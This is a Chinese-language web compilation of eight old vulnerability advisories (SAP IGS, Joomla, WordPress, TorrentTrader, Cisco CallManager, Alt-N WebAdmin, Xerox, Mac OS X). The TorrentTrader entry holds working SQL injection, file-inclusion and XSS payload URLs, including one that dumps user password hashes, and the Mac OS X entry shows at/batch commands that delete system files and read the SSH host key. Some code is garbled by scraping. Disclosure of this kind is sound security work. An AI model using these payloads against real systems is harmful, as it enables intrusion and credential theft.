SAP Internet图形服务器多个远程安全漏洞

时间:2022-04-06 11:45:28 作者:GotNowhere 综合材料 收藏本文 下载本文

“GotNowhere”通过精心收集,向本站投稿了8篇SAP Internet图形服务器多个远程安全漏洞,以下是小编为大家整理后的SAP Internet图形服务器多个远程安全漏洞,希望能够帮助到大家。

篇1:SAP Internet图形服务器多个远程安全漏洞

受影响系统:SAP Internet Graphics Server 7.00 Patchlevel <= 6

SAP Internet Graphics Server 6.40 Patchlevel <= 16不受影响系统:SAP Internet Graphics Server 7.00 Patchlevel 7

SAP Internet Graphics Server 6.40 Patchlevel 17描述:

BUGTRAQ  ID: 21449,21448

Internet Graphics Server(IGS)是SAP R/3企业环境的一个组件,可提供图形服务,

IGS实现上存在多个安全漏洞,远程攻击者可能利用这些漏洞获取敏感信息或执行非授权的恶意操作。

远程攻击者可以通过向SAP IGS提交特制的HTTP请求删除系统中的任意文件,

此外,远程攻击者还可以利用SAP IGS中的一些功能关闭服务器、访问配置文件或执行某些其他非授权操作。

<*来源:Mariano Nuñez Di Croce (mnunez@cybsec.com)

链接:secunia.com/advisories/23262/

www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Undocumented_Features.pdf

www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Remote_Arbitrary_File_Removal.pdf

*>

建议:

厂商补丁:

SAP

---

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

www.sap.com/

篇2:Joomla!多个远程安全漏洞

受影响系统:Joomla! Joomla! < 1.0.11不受影响系统:Joomla! Joomla! 1.0.11描述:

Joomla!是一款开放源码的内容管理系统(CMS),

Joomla!多个远程安全漏洞

Joomla!中存在多个跨站脚本和安全限制绕过漏洞:

1) mosMail和JosIsValidEmail()函数中存在输入验证错误。

2) PEAR.php中存在安全漏洞。

3) globals.php没有包含在administrator/index.php中。

4) 由于缺少defined( '_VALID_MOS' )检查以及Admin “Upload Image”、Admin “Popups”和“com_content”功能中的错误,导致存在不充分的访问控制检查,

电脑资料

5) do_pdf功能以及处理emailform. com_content任务中的漏洞允许用户绕过认证过程。

6) 在返回给用户之前没有正确的过滤Admin “Module Manager”、Admin “Help”和Search功能的输入,导致在用户浏览器中执行任意HTML和脚本代码。

<*来源:Joomla!

链接:secunia.com/advisories/21666/

*>

建议:

厂商补丁:

Joomla!

-------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

forge.joomla.org/sf/frs/do/viewRelease/projects.joomla/frs.joomla_1_0.1_0_11

篇3:WordPress多个远程安全漏洞

受影响系统:

WordPress WordPress 2.2.1

描述:

--------------------------------------------------------------------------------

BUGTRAQ ID: 25161

WordPress是一款免费的论坛Blog系统,

WordPress处理用户提交的数据时存在多个输入验证漏洞,远程攻击者可能利用这些漏洞执行跨站脚本、SQL注入或收集敏感信息。

WordPress的themes.php、options.php、link-import.php、upload.php脚本实现存在跨站脚本执行漏洞,options.php脚本还存在SQL注入和信息泄露漏洞,

<*链接:mybeni.rootzilla.de/mybeNi//wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nea

*>

建议:

--------------------------------------------------------------------------------

厂商补丁:

WordPress

---------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

wordpress.org/

文章来自: 绿盟科技

篇4:TorrentTrader Classic多个远程安全漏洞

hacknote.com

发布时间:-06-15

测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

[waraxe-2009-SA#074] - Multiple Vulnerabilities in TorrentTrader Classic 1.09

===============================================================================

Author: Janek Vind “waraxe”

Date: 15. June 2009

Location: Estonia, Tartu

Web: www.waraxe.us/advisory-74.html

Description of vulnerable software:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TorrentTrader is a feature packed and highly customisable PHP/MySQL Based

BitTorrent tracker. Featuring integrated forums and plenty of administration

options. Please visit www.torrenttrader.org for the support forums.

sourceforge.net/projects/torrenttrader

List of found vulnerabilities

===============================================================================

1. Sql Injection vulnerability in “account-inbox.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. unsanitized user submitted parameter “origmsg” is used in sql query

Preconditions:

1. attacker must be logged in as valid user

Test:

localhost/torrenttrader109/account-inbox.php?msg=1&receiver=waraxe&origmsg=foobar&delete=yes

Result: “MYSQL Error has occurred!”

-----------------------------[source code start]-------------------------------

if ($msg) {

$msg = trim($msg);

$res = mysql_query(“SELECT id, acceptpms, notifs, email, UNIX_TIMESTAMP(last_access) as la FROM users WHERE username=”.sqlesc($receiver).“”);

$user = mysql_fetch_assoc($res);

if (!$user)

$message = “Username not found.”;

...

if ($origmsg && $delete == “yes”)

mysql_query(“DELETE FROM messages WHERE id=$origmsg”) or sqlerr;

-----------------------------[source code end]---------------------------------

2. Weak password generation algorithm in “account-recover.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. generated password is weak and can be easily bruteforced

Preconditions:

1. attacker must know email address associated with target's account

Torrenttrader contains password reseting functionality:

localhost/torrenttrader109/account-recover.php

Anyone can initiate password reset, only condition is, that target's email

address must be know. Torrenttrader will check email address and after successful

validation new, temporal password will be generated and sent to that email address.

Specific autogenerated password appears to be random number between 10000 and 50000,

so basically there can be only 40000 possible temporal passwords. It's easy to

write bruteforce script, which will try all possible password combinations.

This process can take couple of hours or more, but eventually the password will

be guessed and target account becomes compromised.

-----------------------------[source code start]-------------------------------

if ($HTTP_SERVER_VARS[“REQUEST_METHOD”] == “POST”) {

$email = trim($_POST[“email”]);

if (!validemail($email)) {

$msg = “” . NOT_VAILD_EMAIL . “”;

$kind = “Error”;

}

else {

$res = mysql_query(“SELECT * FROM users WHERE email=” . sqlesc($email) . “ LIMIT 1”);

$arr = mysql_fetch_assoc($res);

if (!$arr) {

$msg = “” . EMAIL_INVALID . “”;

$kind = “Error”;

}

...

if ($arr) {

$newpassword = rand(10000, 50000);

$md5pass = md5($newpassword);

-----------------------------[source code end]---------------------------------

3. Unauthorized database backup vulnerability in “backup-database.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. missing access control

Preconditions:

1. mysqldump utility must be available

2. gzip utility must be available

3. target directory must be writable

4. database name must be known in order to successfully guess archive filename

Test:

localhost/torrenttrader109/backup-database.php

Resulting message: “Database backup successful, entry inserted into database.”

-----------------------------[source code start]-------------------------------

system(sprintf(

'mysqldump --opt -h %s -u %s -p%s %s | gzip >%s/%s/%s-%s-%s-%s.gz',

$host,

$user,

$pass,

$db,

getenv('DOCUMENT_ROOT'),

$backupdir,

$db,

$day,

$month,

$year

));

-----------------------------[source code end]---------------------------------

Attacker is able to create database backup and resulting “gz” archive's

filename can be guessed, if attacker knows database name. This file is also

directly downloadable from website. Example download URI:

localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz

As result information leakage exists. For example, attacker can fetch admin

credentials from backed up database.

4. Sql Injection vulnerability in “browse.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. uninitialized variable “wherecatin” is used in sql query

Preconditions:

1. none

Test:

localhost/torrenttrader109/browse.php?wherecatin=waraxe

Result:

Unknown column 'waraxe' in 'where clause'

-----------------------------[source code start]-------------------------------

if (count($wherecatina) >1)

$wherecatin = implode(“,”,$wherecatina);

elseif (count($wherecatina) == 1)

$wherea[] = “category = $wherecatina[0]”;

...

if ($wherecatin)

$where .= ($where ? “ AND ” : “”) . “category IN(” . $wherecatin . “)”;

if ($where != “”)

$where = “WHERE $where”;

$res = mysql_query(“SELECT COUNT(*) FROM torrents $where”) or die(mysql_error());

-----------------------------[source code end]---------------------------------

This specific sql injection vulneraility can be exploited using blind attack

methods. If there is one or more active torrents in database, then usable is

attack pattern below:

1,1,2)=(SELECT+1“>localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,1,2)=(SELECT+1

and we see found torrents.

50,1,2)=(SELECT+1”>localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,1,2)=(SELECT+1

“No torrents were found based on your search criteria.”

In this way attacker is able to ask boolean questions from database and retrieve

needed information bit by bit - example of classical blind sql injection.

If there is no active torrents in database, then induced sql errors method can be used.

1,(SELECT“>localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>1,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1

”Subquery returns more than 1 row“

50,(SELECT”>localhost/torrenttrader109/browse.php?wherecatin=0)+OR+IF(LENGTH(@@version)>50,(SELECT 1 UNION ALL SELECT 1),2)=(SELECT+1

“No torrents were found based on your search criteria.”

5. Information leakage in “check.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. missing access control

Preconditions:

1. none

Test:

localhost/torrenttrader109/check.php

This script. is originally meant to be used by installer and lately by admins.

Because of lacking access control attacker is able to use it for gathering some

useful information about target system - full path to webroot, file and directory

permissions of specific files, couple of php settings.

6. Sql Injection vulnerability in “delreq.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. unsanitized user submitted parameter “categ” is used in sql query

Preconditions:

1. attacker must have at least super moderator privileges (user class >3)

Comments:

1. very easy to exploit

Test:

localhost/torrenttrader109/delreq.php?categ=waraxe

Result:

You have an error in your SQL syntax; check the manual that corresponds to your

MySQL server version for the right syntax to use near

'waraxe order by requests.request LIMIT 0,50' at line 1

Test 2:

localhost/torrenttrader109/delreq.php?categ=UNION+ALL+SELECT+1,2,3,4,5,username,password,email+FROM+users--+

and we can see all usernames, password hashes and emails from database.

7. Sql Injection vulnerability in “index.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. unsanitized user submitted parameter “choice” is used in sql query

Preconditions:

1. attacker must be logged in as valid user

2. there must exist at least one poll

Testing needs custom written html form.:

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------

Result: “MYSQL Error has occurred!”

-----------------------------[source code start]-------------------------------

if ($_SERVER[“REQUEST_METHOD”] == “POST”)

{

$choice = $_POST[“choice”];

if ($CURUSER && $choice != “” && $choice < 256 && $choice == floor($choice))

{

$res = mysql_query(“SELECT * FROM polls ORDER BY added DESC LIMIT 1”) or sqlerr();

$arr = mysql_fetch_assoc($res) or die(“No poll”);

$pollid = $arr[“id”];

8049 = $CURUSER[“id”];

$res = mysql_query(“SELECT * FROM pollanswers WHERE pollid=$pollid && userid=8049”) or sqlerr();

$arr = mysql_fetch_assoc($res);

if ($arr) die(“Dupe vote”);

mysql_query(“INSERT INTO pollanswers VALUES(0, $pollid, 8049, $choice)”) or sqlerr();

-----------------------------[source code end]---------------------------------

8. Sql Injection vulnerability in “modrules.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. unsanitized user submitted parameter “id” is used in sql query

Preconditions:

1. attacker must have at least moderator privileges

Testing needs custom written html form.:

-------------------------------------------------------------------------------

-------------------------------------------------------------------------------

Test result: “MYSQL Error has occurred!”

-----------------------------[source code start]-------------------------------

elseif ($_GET[“act”]==“edited”){

$id = $_POST[“id”];

$title = sqlesc($_POST[“title”]);

$text = sqlesc($_POST[“text”]);

$public = sqlesc($_POST[“public”]);

$class = sqlesc($_POST[“class”]);

mysql_query(“update rules set title=$title, text=$text, public=$public,

class=$class where id=$id”) or sqlerr(__FILE__,__LINE__);

-----------------------------[source code end]---------------------------------

9. Information leakage in “phpinfo.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. missing access control

Preconditions:

1. none

Test:

localhost/torrenttrader109/phpinfo.php

-----------------------------[source code start]-------------------------------

phpinfo();

?>

-----------------------------[source code end]---------------------------------

This script. can be used by attacker to obtain information from php function

phpinfo(). Access to such script. must be limited to admins, but currently there

is not any access control at all.

10. Sql Injection vulnerabilities in “report.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. unsanitized user submitted parameter “user” is used in sql query

2. unsanitized user submitted parameter “torrent” is used in sql query

3. unsanitized user submitted parameter “forumid” is used in sql query

4. unsanitized user submitted parameter “forumpost” is used in sql query

Preconditions:

1. attacker must be logged in as valid user

Two proof-of-concept tests below are using parameter “user”.

Test 1 needs custom written html form.:

-------------------------------------------------------------------------------

1,(SELECT 1 UNION ALL SELECT 1),1)-- “>

-------------------------------------------------------------------------------

Test result: ”MYSQL Error has occurred!“

Test 2 needs custom written html form.:

-----------------------------[source code start]-------------------------------

50,(SELECT 1 UNION ALL SELECT 1),1)-- ”>

-----------------------------[source code end]---------------------------------

Test result: “You have already reported user ...”

It's classical blind sql injection exploitation method and allows attacker to

fetch information from database bit by bit by asking boolean questions.

Other three sql injection vulnerabilities in “report.php” involve user submitted

parameters “torrent”, “forumid” and “forumpost” and exploitation can be done in

similar way as seen above.

11. Sql Injection vulnerability in “take-deletepm.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. unsanitized user submitted parameter “delmp” is used in sql query

Preconditions:

1. attacker must have admin privileges

-----------------------------[source code start]-------------------------------

if(isset($_POST[“delmp”])) {

$do=“DELETE FROM messages WHERE id IN (” . implode(“, ”, $_POST[delmp]) . “)”;

$res=mysql_query($do)

-----------------------------[source code end]---------------------------------

12. Sql Injection vulnerability in “takedelreport.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. unsanitized user submitted parameter “delreport” is used in sql query

Preconditions:

1. attacker must have at least moderator privileges

-----------------------------[source code start]-------------------------------

jmodonly();

$res = mysql_query (“SELECT id FROM reports WHERE dealtwith=0

AND id IN (” . implode(“, ”, $_POST[delreport]) . “)”);

-----------------------------[source code end]---------------------------------

13. Sql Injection vulnerability in “takedelreq.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. unsanitized user submitted parameter “delreq” is used in sql query

Preconditions:

1. attacker must be logged in as valid user

-----------------------------[source code start]-------------------------------

if (get_user_class() >UC_JMODERATOR){

...

$do=“DELETE FROM requests WHERE id IN (” . implode(“, ”, $_POST[delreq]) . “)”;

$do2=“DELETE FROM addedrequests WHERE requestid IN (” . implode(“, ”, $_POST[delreq]) . “)”;

$res2=mysql_query($do2);

$res=mysql_query($do);

...

} else {

foreach ($_POST[delreq] as $del_req){

$delete_ok = checkRequestOwnership($CURUSER[id],$del_req);

if ($delete_ok){

$do=“DELETE FROM requests WHERE id IN ($del_req)”;

$do2=“DELETE FROM addedrequests WHERE requestid IN ($del_req)”;

...

function checkRequestOwnership ($user, $delete_req){

$query = mysql_query(“SELECT * FROM requests WHERE userid=$user AND id = $delete_req”) or sqlerr();

-----------------------------[source code end]---------------------------------

14. Sql Injection vulnerability in “takestaffmess.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. unsanitized user submitted parameter “clases” is used in sql query

Preconditions:

1. attacker must have admin privileges

-----------------------------[source code start]-------------------------------

adminonly();

...

$updateset = $_POST['clases'];

$query = mysql_query(“SELECT id FROM users WHERE class IN (”.implode(“,”, $updateset).“)”);

-----------------------------[source code end]---------------------------------

15. Sql Injection vulnerability in “takewarndisable.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. unsanitized user submitted parameter “warndisable” is used in sql query

Preconditions:

1. attacker must have at least moderator privileges

-----------------------------[source code start]-------------------------------

jmodonly();

...

if ($disable != '') {

$do=“UPDATE users SET enabled='no' WHERE id IN (” . implode(“, ”, $_POST['warndisable']) . “)”;

$res=mysql_query($do);

}

if ($enable != '') {

$do = “UPDATE users SET enabled='yes' WHERE id IN (” . implode(“, ”, $_POST['warndisable']) . “)”;

$res = mysql_query($do);

}

-----------------------------[source code end]---------------------------------

16. Sql Injection vulnerability in “today.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. uninitialized variable “limit” is used in sql query

Preconditions:

1. none

Comments:

1. seems hard to exploit

Test:

localhost/torrenttrader109/today.php?limit=waraxe

Result:

“Warning: mysql_num_rows(): supplied argument is not a valid MySQL result

resource in C:apache_wwwroottorrenttrader109today.php on line 21”

17. Sql Injection vulnerability in “torrents-details.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. uninitialized variable “where” is used in sql query

Preconditions:

1. none

-----------------------------[source code start]-------------------------------

//speed mod

$resSpeed = mysql_query(“SELECT seeders,leechers FROM torrents

WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15”)

or sqlerr(__FILE__, __LINE__);

-----------------------------[source code end]---------------------------------

Exploitation is possible using blind sql injection methods.

Test 1:

localhost/torrenttrader109/torrents-details.php?id=1&

where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+

Result: normal page

Test 2:

localhost/torrenttrader109/torrents-details.php?id=1&

where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+

Result: “MYSQL Error has occurred!”

18. Sql Injection vulnerability in “admin-delreq.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. uninitialized variable “categ” is used in sql query

Preconditions:

1. attacker must have at least moderator privileges

-----------------------------[source code start]-------------------------------

jmodonly();

...

$res=mysql_query(“SELECT users.username, requests.filled, requests.filledby,

requests.id, requests.userid, requests.request, requests.added, categories.name

as cat FROM requests inner join categories on requests.cat = categories.id

inner join users on requests.userid = users.id

$categ order by requests.request $limit”) or print(mysql_error());

-----------------------------[source code end]---------------------------------

Test:

localhost/torrenttrader109/admin-delreq.php?categ=waraxe

Result: “You have an error in your SQL syntax; check the manual that corresponds

to your MySQL server version for the right syntax to use

near 'waraxe order by requests.request LIMIT 0,50' at line 1”

19. Persistent XSS in “viewrequests.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. unsanitized user submitted parameters used in response html generation

Preconditions:

1. attacker must be logged in as valid user

Steps for testing:

a) attacker submits request:

localhost/torrenttrader109/requests.php

In “Title” field let's insert some javascript.:

testtitle

b) admin will browse requests:

localhost/torrenttrader109/viewrequests.php

and previously planted javascript. will be executed in admin session context.

20. Persistent XSS in logging funtionality

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. unsanitized user submitted parameters used in response html generation

Preconditions:

1. attacker must be logged in as valid user

Steps for testing:

a) attacker uploads torrent file:

localhost/torrenttrader109/torrents-upload.php

In “Torrent Name” field let's insert some javascript.:

testname

Upload is successful: “The torrent has been uploaded successfully!”

b) admin will browse logs:

localhost/torrenttrader109/admin.php?act=view_log

and previously planted javascript. will be executed in admin session context.

21. Local File Inclusion vulnerability in “backend/admin-functions.php”

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Reasons:

1. URI case-insensitivity on Windows platform

Preconditions:

1. Windows platform

2. register_globals=on

3. magic_quotes_gpc=off

-----------------------------[source code start]-------------------------------

if (strpos($_SERVER['REQUEST_URI'], “admin-functions.php”) !== false) die;

require_once(“./themes/” . $GLOBALS['ss_uri'] . “/block.php”);

-----------------------------[source code end]---------------------------------

As we can see from source code snippet above, direct access to script. is blocked.

In case of Windows and Apache combination URI handling is case-insensitive.

In other hand “strpos()” function, used for access control, is case-sensitive.

So this script. can be directly executed, if we change some characters in script's

filename to uppercase:

localhost/torrenttrader109/backend/Admin-functions.php

“Warning: require_once(./themes//block.php) [function.require-once]:

failed to open stream: No such file or directory in

C:apache_wwwroottorrenttrader109backendadmin-functions.php on line 3”

If “register_globals=on” and “magic_quotes_gpc=off”, then LFI is possible:

localhost/torrenttrader109/backend/Admin-functions.php?ss_uri=../../banners.txt%00

22. Reflected XSS in multiple scripts

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Examples:

localhost/torrenttrader109/faq.php?faq_categ[999][title]=&faq_categ[999][flag]=1

localhost/torrenttrader109/torrents-details.php?id=1&keepget=“>

Greetings:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,

to all active waraxe.us forum members and to anyone else who know me!

Contact:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com

Janek Vind ”waraxe“

Waraxe forum: www.waraxe.us/forums.html

Personal homepage: www.janekvind.com/

---------------------------------- [ EOF ] ------------------------------------

篇5:Cisco CallManager CLI多个远程安全漏洞

受影响系统:

Cisco Unified CallManager 5.0(3a)

Cisco Unified CallManager 5.0(3)

Cisco Unified CallManager 5.0(2)

Cisco Unified CallManager 5.0(1)

不受影响系统:

CiscoUnified CallManager 5.0(4)

描述:

BUGTRAQ ID: 18952

Cisco Unified CallManager是Cisco IP电话解决方案中基于软件的呼叫处理组件,

CallManager CLI提供了到系统的备用管理接口,以便诊断和排除基于HTTPS的主管理接口上的故障。这个以root用户权限运行的CLI在解析命令时存在两个漏洞,

第一个漏洞可能允许认证的CUCM管理员以root用户执行任意操作系统程序,第二个漏洞允许将命令输出重新定向到命令行中所指定的文件或文件夹。

Cisco Unified CallManager支持同时存在SCCP和SIP电话,这就允许迁移到SIP而仍保护对现有设备的投资。CUCM在处理SIP请求中的超长主机名时存在缓冲区溢出漏洞,可能导致执行任意代码或拒绝服务。

链接:www.cisco.com/warp/public/707/cisco-sa-0712-cucm.shtml

建议:

厂商补丁:

Cisco

Cisco已经为此发布了一个安全公告(cisco-sa-20060712-cucm)以及相应补丁:

cisco-sa-20060712-cucm:Multiple Cisco Unified CallManager Vulnerabilities

链接:www.cisco.com/warp/public/707/cisco-sa-20060712-cucm.shtml

补丁下载:

www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-50

篇6:AltN WebAdmin多个安全漏洞

转自:绿盟科技

发布日期:-01-28

更新日期:2005-01-31

受影响系统:

Alt-N WebAdmin 3.0.2

不受影响系统:

Alt-N WebAdmin 3.0.4

描述:

--------------------------------------------------------------------------------

WebAdmin是Alt-N技术公司开发的管理MDaemon、RelayFax和WorldClient的WEB应用程序,

Alt-N WebAdmin存在多个安全问题,远程攻击者可以利用这些漏洞进行跨站脚本,编辑用户帐户等攻击。

1、跨站脚本问题:

useredit_account.wdm没有正确过滤用户提交的URL数据,提交恶意脚本代码作为参数数据,可获得目标用户敏感信息:

server/WebAdmin/useredit_account.wdm?user=%3Cscript%3Ealert('test')%3C/script%3E

2、用户可编辑所有用户帐户

useredit_account.wdm脚本对对其他帐户的访问没有任何验证,可提交如下URL请求编辑其他用户帐户信息:

server/WebAdmin/useredit_account.wdm?user=otheruser@domain

3、HTML注入

文件modalfram.wdm允许装载任意WEB页,可使用户盲目信任页面内容,

<*来源:David_Alonso (kamborio@gmail.com)

链接:marc.theaimsgroup.com/?l=bugtraq&m=110692897003614&w=2

*>

建议:

--------------------------------------------------------------------------------

厂商补丁:

Alt-N

-----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

www.altn.com/products/default.asp?product%5Fid=WebAdmin

篇7:Xerox WorkCentre及WorkCentre Pro多个安全漏洞

受影响系统:Xerox WorkCentre Pro 275

Xerox WorkCentre Pro 265

Xerox WorkCentre Pro 255

Xerox WorkCentre Pro 245

Xerox WorkCentre Pro 238

Xerox WorkCentre Pro 232

Xerox WorkCentre 275

Xerox WorkCentre 265

Xerox WorkCentre 255

Xerox WorkCentre 245

Xerox WorkCentre 238

Xerox WorkCentre 232描述:

BUGTRAQ  ID: 21365

Xerox WorkCentre是一款数码打印复印一体机,

Xerox WorkCentre的ESS/Network Controller和MicroServer Web Server代码中存在多个安全漏洞,具体如下:

* Web用户接口上的TCP/IP用户名存在命令注入漏洞;

* Web用户接口上的Scan-to-mailbox文件夹名称字段存在命令注入漏洞;

* Web用户接口上的Microsoft Networking配置参数存在命令注入漏洞;

* 浏览器权限可能允许非授权访问;

* TFTP/BOOTP自动配置选项可能允许非授权的配置设置;

* 可使用HTTP而不是HTTPS发布Web服务请求;

* 可以劫持邮件消息签名显示不正确的项;

* Scan-to-mailbox功能可能允许匿名未经验证下载安全的文件;

* 设备无法保持精确的时间,因此审计日志中的时间戳不正确,

成功利用这些漏洞的攻击者可以获得非授权访问或更改系统配置。

<*来源:XEROX

链接:a1851.g.akamaitech.net/f/1851/2996/24h/cacheB.xerox.com/downloads/usa/en/c/cert_XRX06_006_v1.

*>

建议:

厂商补丁:

Xerox

-----

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

www.xerox.com

篇8:Apple OSX多个应用程序安全漏洞

转自:绿盟科技

发布日期:2005-01-26

更新日期:2005-01-31

受影响系统:

Apple MacOS X Server 10.3.7

Apple MacOS X 10.3.7

描述:

--------------------------------------------------------------------------------

CVE(CAN) ID: CAN-2005-0125

Mac OS X是一款基于BSD的操作系统,

Mac OS X包含的at相关的多个命令没有正确丢弃权限,本地攻击者可以利用这些漏洞删除文件,运行任意命令,读取敏感信息。

'atrm'可以用于删除系统任意文件:

CrunkJuice:~ kevinfinisterre$ id

uidP1(kevinfinisterre) gidP1(kevinfinisterre) groupsP1(kevinfinisterre),

79(appserverusr), 80(admin), 81(appserveradm)

CrunkJuice:~ kevinfinisterre$ rm /etc/hosts

override rw-r--r--  root/wheel for /etc/hosts? y

rm: /etc/hosts: Permission denied

CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts

-rw-r--r--  1 root  wheel  214  3 Dec 20:19 /etc/hosts

CrunkJuice:~ kevinfinisterre$ atrm /etc/hosts

CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts

ls: /etc/hosts: No such file or directory

'batch'可以用于以gid=0(wheel) groups=0(wheel), 1(daemon),

2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)特权执行任意命令:

CrunkJuice:/tmp kevinfinisterre$ echo >aa

/usr/bin/id >/tmp/test

CrunkJuice:/tmp kevinfinisterre$ batch -f /tmp/aa 0

Job b0118490c.000 will be executed using /bin/sh

CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test

cat: /tmp/test: No such file or directory

(wait 5 minutes)

CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test

uidP1(kevinfinisterre) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys),

4(tty), 5(operator), 20(staff), 31(guest), 80(admin)

'batch'也可以用于读取系统任意文件:

CrunkJuice:~ kevinfinisterre$ cat /etc/ssh_host_dsa_key

cat: /etc/ssh_host_dsa_key: Permission denied

CrunkJuice:~ kevinfinisterre$ ls -al /etc/ssh_host_dsa_key

-rw-------  1 root  wheel  668 16 Nov 19:39 /etc/ssh_host_dsa_key

CrunkJuice:~ kevinfinisterre$ batch -f /etc/ssh_host_dsa_key

Job b011848db.000 will be executed using /bin/sh

CrunkJuice:~ kevinfinisterre$ ls -al /var/at/jobs/b011848db.000

-rwx------  1 kevinfin  wheel  1263  3 Dec 20:31 /var/at/jobs/b011848db.000

CrunkJuice:~ kevinfinisterre$ cat /var/at/jobs/b011848db.000

#! /bin/sh

# mail     root 0

umask 22

TERM_PROGRAM=Apple_Terminal; export TERM_PROGRAM

SHELL=/bin/bash; export SHELL

TERM_PROGRAM_VERSION0; export TERM_PROGRAM_VERSION

LDPWD=/var/at/jobs; export OLDPWD

USER=kevinfinisterre; export USER

__CF_USER_TEXT_ENCODING=0x1F5:0:0; export __CF_USER_TEXT_ENCODING

PATH=/bin:/sbin:/usr/bin:/usr/sbin; export PATH

PWD=/Users/kevinfinisterre; export PWD

SHLVL=1; export SHLVL
